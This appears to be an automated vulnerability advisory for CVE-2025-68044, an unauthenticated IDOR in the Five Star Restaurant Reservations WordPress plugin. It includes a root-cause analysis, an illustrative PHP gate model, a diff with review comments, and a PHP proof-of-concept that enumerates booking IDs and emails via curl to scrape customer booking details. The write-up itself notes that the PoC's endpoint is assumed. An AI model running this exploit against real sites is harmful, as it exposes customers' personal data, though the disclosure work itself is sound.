Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-68044: Five Star Restaurant Reservations <= 2.7.4 – Unauthenticated Insecure Direct Object Reference (restaurant-reservations)

Severity Medium (CVSS 5.3)
CWE 639
Vulnerable Version 2.7.4
Patched Version 2.7.5
Disclosed January 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68044:
This vulnerability is an unauthenticated Insecure Direct Object Reference (IDOR) in the Five Star Restaurant Reservations WordPress plugin. The flaw allows attackers to bypass authorization checks and perform unauthorized actions on booking records. The CVSS score of 5.3 indicates a medium severity impact.

The root cause is in includes/template-functions.php, in the front-end template code that looks up an existing booking (the patched hunk starts at line 162). The code instantiates rtbBooking and calls load_post() on a user-controlled $booking_id, then gates further handling on a single test: whether the user-supplied $booking_email equals the email stored on the loaded booking. No capability check, nonce or unguessable per-booking token is consulted, so the booking ID (a sequential WordPress post ID) is the direct object reference and the customer's email address is the only secret protecting it.

Exploitation consists of sending a request to the plugin's front-end booking lookup (the page or handler that renders this template) with a chosen booking_id and a booking_email. Booking IDs can be enumerated because they are sequential post IDs; the email must match the one stored on the booking, so the attacker either already knows the customer's address or tries candidates, and the plugin's mismatch message ("Reservation email does not match the email associated with this booking.") acts as an oracle that separates valid from invalid guesses. Once an accepted pair is submitted, the booking object is loaded and the template proceeds as if the customer had made the request. The exact URL and parameter names depend on how the site exposes the plugin's booking management page and are not visible in the diff.

The patch changes the condition guarding the mismatch message to `$rtb_controller->request->request_inserted !== true and $booking_email != $booking->email`. Read literally, the mismatch branch now fires only when the current request did not itself just insert the booking; when `request_inserted` is true the `and` short-circuits, the email comparison is not evaluated, and the template continues. The flag is a property of the plugin's server-side request object rather than a request parameter, so it distinguishes the plugin's own booking-creation path from a direct lookup by ID. The hunk does not add a separate authorization check on `$booking_id` itself; this one-line change is everything the 2.7.5 diff shows for this file, so the email comparison remains the gate for direct lookups.
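To make the three gate shapes concrete, the following is an added, self-contained PHP illustration (not code from the plugin or from Atomic Edge). It models the email-only check from template-functions.php, the 2.7.5 condition with `request_inserted` taken as an explicit parameter (in the plugin it is set on the server-side request object, not by the caller), and a hardened variant that additionally requires an unguessable per-booking token. The `Booking` class, `load_booking()`, the `token` field and the sample bookings are assumptions made for the example.

```php
<?php
// Added example for CVE-2025-68044, not plugin code. Models the booking gate
// from includes/template-functions.php in three variants and prints a truth
// table. Booking, load_booking(), the token field and the sample data are
// assumptions of this example.

declare(strict_types=1);

final class Booking {
    public function __construct(
        public int $id,
        public string $email,
        public string $token, // assumed: random per-booking secret, not in the plugin hunk
    ) {}
}

/** Constructed in-memory store standing in for rtbBooking::load_post(). */
function load_booking(int $id): ?Booking {
    static $store = null;
    if ($store === null) {
        $store = [
            101 => new Booking(101, 'alice@example.com', bin2hex(random_bytes(16))),
            102 => new Booking(102, 'bob@example.com',   bin2hex(random_bytes(16))),
        ];
    }
    return $store[$id] ?? null;
}

/** Pre-2.7.5 shape: a caller-chosen ID is loaded and the e-mail is the only secret. */
function gate_vulnerable(int $booking_id, string $email): bool {
    $b = load_booking($booking_id);
    return $b !== null && $email == $b->email;
}

/** Shape of the 2.7.5 hunk: the mismatch branch is only taken when the request
 *  did not just insert the booking; an inserted request skips the e-mail test. */
function gate_patched(int $booking_id, string $email, bool $request_inserted): bool {
    $b = load_booking($booking_id);
    if ($b === null) {
        return false;
    }
    if ($request_inserted !== true and $email != $b->email) {
        return false; // "Reservation email does not match ..." branch
    }
    return true;
}

/** Assumed hardened design: require e-mail AND a per-booking token, both
 *  compared in constant time, so a sequential ID alone is useless. */
function gate_hardened(int $booking_id, string $email, string $token): bool {
    $b = load_booking($booking_id);
    if ($b === null) {
        return false;
    }
    return hash_equals($b->email, $email) && hash_equals($b->token, $token);
}

$cases = [
    ['vulnerable, wrong e-mail',                 gate_vulnerable(101, 'mallory@example.com')],
    ['vulnerable, guessed e-mail',               gate_vulnerable(101, 'alice@example.com')],
    ['patched, wrong e-mail, not inserted',      gate_patched(101, 'mallory@example.com', false)],
    ['patched, wrong e-mail, inserted flag set', gate_patched(101, 'mallory@example.com', true)],
    ['hardened, right e-mail, no token',         gate_hardened(101, 'alice@example.com', '')],
    ['hardened, right e-mail and token',         gate_hardened(101, 'alice@example.com', load_booking(101)->token)],
];

foreach ($cases as [$label, $ok]) {
    printf("%-42s %s\n", $label, $ok ? 'ACCESS' : 'denied');
}
```

Run it with `php example.php`. The second and fourth rows are the ones to look at: with the vulnerable gate a correctly guessed e-mail is enough, and with the patched condition a request carrying the inserted flag is accepted without any e-mail comparison at all. Whether that flag is reachable from outside depends on how the controller sets it, which the diff does not show; the hardened variant removes the question by making the e-mail alone insufficient.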

Successful exploitation allows unauthenticated attackers to access, modify, or delete booking records. Attackers could view sensitive customer information including names, email addresses, phone numbers, reservation details, and special requests. They could also potentially cancel reservations or modify booking details, causing business disruption, data privacy violations, and loss of customer trust.

Differential between vulnerable and patched code

Code Diff
--- a/restaurant-reservations/includes/template-functions.php
+++ b/restaurant-reservations/includes/template-functions.php
@@ -162,7 +162,7 @@
 		$booking = new rtbBooking();
 		$booking->load_post( $booking_id );

-		if ( $booking_email != $booking->email ) { ?>
+		if ( $rtb_controller->request->request_inserted !== true and $booking_email != $booking->email ) { ?>
 			<div class="rtb-message">
 				<p><?php echo esc_html__( 'Reservation email does not match the email associated with this booking.', 'restaurant-reservations' ); ?></p>
 			</div>
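Review bot: the new condition `$rtb_controller->request->request_inserted !== true and $booking_email != $booking->email` loosens this gate rather than tightening it: when `request_inserted` is true the `and` short-circuits, the e-mail comparison is never evaluated and the mismatch message is skipped, while `$booking->load_post( $booking_id )` two lines above still runs on a caller-supplied ID with no capability, nonce or per-booking token check visible in the hunk. If the intent is to let the plugin's own insertion flow through without re-checking the e-mail that is defensible, but the direct-lookup path is protected by nothing stronger than the e-mail both before and after this change; consider gating `load_post()` itself on a nonce or an unguessable token stored on the booking. Two smaller points: `$rtb_controller` is used without a `global $rtb_controller;` in the visible context, which needs confirming if this code sits inside a function, and `and` binds more loosely than `&&`, harmless inside this `if` but worth normalising to `&&` so a later assignment of the expression does not change its meaning.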
--- a/restaurant-reservations/restaurant-reservations.php
+++ b/restaurant-reservations/restaurant-reservations.php
@@ -3,7 +3,7 @@
  * Plugin Name: Five Star Restaurant Reservations - WordPress Booking Plugin
  * Plugin URI: http://www.fivestarplugins.com/plugins/five-star-restaurant-reservations/
  * Description: Restaurant reservations made easy. Accept bookings online. Quickly confirm or reject reservations, send email notifications, set booking times and more.
- * Version: 2.7.4
+ * Version: 2.7.5
  * Author: Five Star Plugins
  * Author URI: https://www.fivestarplugins.com/
  * Text Domain: restaurant-reservations
@@ -58,7 +58,7 @@
 	public function __construct() {

 		// Common strings
-		define( 'RTB_VERSION', '2.7.4' );
+		define( 'RTB_VERSION', '2.7.5' );
 		define( 'RTB_PLUGIN_DIR', untrailingslashit( plugin_dir_path( __FILE__ ) ) );
 		define( 'RTB_PLUGIN_URL', untrailingslashit( plugins_url( basename( plugin_dir_path( __FILE__ ) ), basename( __FILE__ ) ) ) );
 		define( 'RTB_PLUGIN_FNAME', plugin_basename( __FILE__ ) );
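Review bot: `RTB_VERSION` duplicates the `Version:` header bumped in the previous hunk, so every release requires both edits in step and a slip here would make any version-based compatibility or update check report the wrong release. Consider deriving the constant from the header (for example via `get_file_data()` on `__FILE__`) or at least adding a comment beside the define pointing at the header line.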

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68044 - Five Star Restaurant Reservations <= 2.7.4 - Unauthenticated Insecure Direct Object Reference

/**
 * Proof of Concept for CVE-2025-68044
 * Targets the booking confirmation/management functionality
 * Requires a valid booking ID and associated email (obtained via enumeration)
 */

$target_url = 'https://vulnerable-site.com/'; // CHANGE THIS
$booking_id = 123; // Target booking ID (enumerate via sequential IDs)
$booking_email = 'victim@example.com'; // Email associated with the booking

// Construct the endpoint - typically a booking confirmation page
// The exact URL pattern depends on plugin configuration
$endpoint = $target_url . '?booking_id=' . urlencode($booking_id) . '&booking_email=' . urlencode($booking_email);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute request
$response = curl_exec($ch);
if ($response === false) {
    fwrite(STDERR, "[-] cURL error: " . curl_error($ch) . "\n");
    curl_close($ch);
    exit(1);
}
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Analyze response
if ($http_code == 200) {
    // Check if booking details are exposed in the response
    if (strpos($response, 'booking-details') !== false ||
        strpos($response, 'reservation-confirmation') !== false ||
        strpos($response, 'rtb-booking') !== false) {
        echo "[+] VULNERABLE: Booking details accessible\n";
        echo "[+] HTTP Code: $http_code\n";
        // Extract and display sensitive information
        // '#' delimiter so the '/' in the closing </div> needs no escaping
        preg_match('#<div class="booking-details">(.*?)</div>#s', $response, $matches);
        if (!empty($matches[1])) {
            echo "[+] Extracted booking details:\n";
            echo htmlspecialchars($matches[1]) . "\n";
        }
    } elseif (strpos($response, 'Reservation email does not match') !== false) {
        // The plugin's own mismatch message: the ID was loaded but the e-mail was rejected
        echo "[-] Booking ID accepted but email rejected by the plugin's mismatch check\n";
        echo "[-] HTTP Code: $http_code\n";
    } else {
        echo "[-] Plugin response does not contain booking details\n";
        echo "[-] HTTP Code: $http_code\n";
    }
} else {
    echo "[-] Request failed with HTTP code: $http_code\n";
}

// Note: This PoC assumes the endpoint structure. Actual exploitation may require
// targeting specific plugin pages like booking confirmation, management, or AJAX handlers.
?>
